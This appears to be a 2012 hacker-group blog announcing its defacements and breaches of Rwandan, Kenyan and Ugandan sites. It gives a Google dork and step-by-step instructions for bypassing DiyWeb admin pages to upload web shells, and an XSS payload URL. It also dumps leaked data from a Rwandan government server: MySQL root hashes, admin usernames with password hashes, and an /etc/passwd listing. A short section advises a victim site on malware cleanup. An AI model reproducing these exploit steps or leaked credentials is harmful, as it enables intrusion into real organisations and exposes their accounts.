Thursday, August 30, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit


Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp

Dork : "Power by DiyWeb"
            inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
This exploit's almost all vulnerable websites are Malaysiyan.
To upload your files Goto : http://www.website.com/diyweb/menu/admin/image_manager.asp

and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites
Link:http://www.famosapadu.com.my/images/index.html

Google website's Vulnerable to XSS

Link:http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert%28%27XSS-BY-RWANDAN-HACKERS%27%29%3C/script%3E

we discovered a cross site scripting(XSS)
vulnerability in google website.we already reported the vulnerability to google security expert

Wednesday, August 29, 2012

Biochemistry - Makerere University website HACKED !!!

 Link:http://biochemistry.mak.ac.ug/start/index.php
Makerere University Department Of Biochemistry hacked by Rwandan Hackers
Dedications to "UGANDAN HACKERS"

                                                            ADMIN PANEL
       

Saturday, August 18, 2012

National Oil Corporation of Kenya Defaced by Rwandan hackers


HACKED LINK:http://www.nockenya.co.ke/images/hacked.html


National Oil is state corporation under the Ministry of Energy incorporated in April 1981 and charged with participation in all aspects of the petroleum industry. National Oil has a 100% Government of Kenya shareholding.
National Oil became operational in 1984 and its initial operations were limited to exploration activities delegated from the Ministry of Energy. In 1988, National Oil went downstream and actively started participating in the importation and sale of petroleum products including crude oil, white fuels, lubricants and LPG.
The formation of National Oil was precipitated by the oil crisis of the 1970's(1973/74 and 1979/80) and the correspondent supply disruptions and price hikes which resulted in the country's oil bill comprising of almost one third of the total value of imports and therefore making petroleum the largest single drain of Kenya's foreign exchange earnings.
National Oil was therefore born out a need by the Government of Kenya to have greater control of the petroleum sector which is a crucial determinant of the country’s economic performance. National Oil has since remained the Government’s policy instrument in matters related to oil specifically in the upstream exploration of oil and gas, mid-stream development of petroleum infrastructure and downstream marketing of petroleum products including motor and industrial fuels, lubricants, LPG and related motor consumables and hardware.

                                                       WE ARE BACK KENYA !!!

Sunday, August 12, 2012

Orinfor.gov.rw hacked #database Leaked


VULNERABILITY DESCRPTION:

Apache httpd Remote Denial of Service
Vulnerability description
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tools has been observed. The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.


This alert was generated using only banner information.

Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).

This vulnerability affects Web Server.
Discovered by: Scripting (Version_Check.script).
Attack details
Current version is : 2.2.8

Some message and ip addresses from orinfor
SERVER INFO:
Target:http://www.orinfor.gov.rw/
Host IP:41.74.172.227
Web Server:Apache/2.2.8 (Ubuntu)
DB Server:MySQL
Resp. Time(avg):1406 ms
Current User:datareader@localhost
Sql Version:5.0.96-0ubuntu3
Current DB:orinfordb
System User:datareader@localhost
Host Name:orinfor-webbackup
Installation dir:/usr/
DB User & Pass:root:*9E98C0F798B9FD4DFA49B179794DCF6CA54A33F9:localhost
root:*9E98C0F798B9FD4DFA49B179794DCF6CA54A33F9:orinfor-webbackup
root:*9E98C0F798B9FD4DFA49B179794DCF6CA54A33F9:127.0.0.1
::localhost
::orinfor-webbackup
debian-sys-maint:*D01D02EC3BE8C42F723915A3F8C36D906032D19B:localhost
datareader:*850D7998C8CE8E017B83A5DB0B8F82305246A875:localhost
Data Bases: information_schema
   mysql
   orinfordb


ADMIN PASSWORD 

Table:orinfor_users
Total Rows:5
username             password
imvaho      fe4cdddb852bc8d0df32cb05fb733a5e
lnr              93892f345b15f01bdc8c9c267c1eb5ca
news              d266b45c5d67eae03ce857161f06119c
radio               9276df22aacecc2028fe854c795c3c6d
sylvain       ba6a80be17af442b55003d73f5aaee5b


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
orinfor:x:1000:1000:orinfor,,,:/home/orinfor:/bin/bash
ftp:x:106:65534::/home/ftp:/bin/false
mysql:x:107:115:MySQL Server,,,:/var/lib/mysql:/bin/false


Saturday, August 4, 2012

Rwandan diaspora website hacked by Rwandan Hackers #GOV.RW

Rwandan diaspora website have been hacked by Rwandan Hackers
Link:http://jobs.rwandandiaspora.gov.rw/cv/34testRwandanhackers.txt


Vulnerability description
Manual confirmation is required for this alert.


This page is using a weak password. . A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes. 
Affected items
/profileloginconfirm.php 
The impact of this vulnerability
An attacker may access the contents of the password-protected page.


How to fix this vulnerability
Enforce a strong password policy. Don't permit weak passwords or passwords based on dictionary words.



Igihe website infected with malware



It seems that the site igihe.com was infected by a Russian hacker
because igihe.com was redirected to a website host in Russia http://ilulxak.ru /http://nycaqsy.ru .


We wrote an article on vulnerabilities found in igihe.com website some days ago
http://rwandan-hackers.blogspot.fr/2012/07/igihecom-vulnerable-to-xss.html

I think the hacker used this exploit

http://www.exploit-db.com/exploits/9448/ [SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit]

https://badwarebusters.org/main/itemview/7997 [more advice Here ]


I think you’ll find that the site has been compromised because of a leaked password.
Several infections seem to exist on the site.

First of all, check the administrative PC for malware, use multiple AV and Malware scanners to check and remove any found.

Change the password of the FTP, preferably from an alternate PC.

Do NOT store the password in your FTP client.

Find and remove the malware that is on the site:
Your .htaccess file may redirect search engine traffic, so please check the .htaccess file in all folders including above the root folder of the site itself.
You’ve also got a Martuz or variant thereof, so you will likely find iframe or malicious scripts embedded in the various files of your site. Check both normal html/php file as well as Script files.

When all is done and found, you can request a Review from Google Webmaster Tools. This review will take a few hours, but if no suspicious activity is found, then the site will be taken off the suspicious list.

Tools you may find useful, including website scanners:
http://badwarebusters.org/main/itemview/1659#itemblock-3035

Google webmaster tools:
http://www.google.com/webmasters/tools/

Your Diagnostics page:
http://www.google.com/safebrowsing/diagnostic?site=http://igihe.com

The website is under construction

update at 00:12 August 4, 2012:

I saw that they copy this article to explain the nature of the virus
next time do your work and stop copying our work